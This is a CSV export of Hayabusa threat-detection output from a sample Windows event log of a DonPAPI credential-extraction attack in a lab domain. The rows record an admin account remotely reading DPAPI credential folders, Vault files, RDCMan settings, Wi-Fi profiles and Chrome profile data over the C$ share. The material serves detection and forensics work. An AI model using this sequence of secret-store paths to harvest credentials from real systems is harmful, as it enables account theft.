2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Wlansvc\Profiles\Interfaces | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.780 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.813 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.815 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.702 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.735 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.735 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.735 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
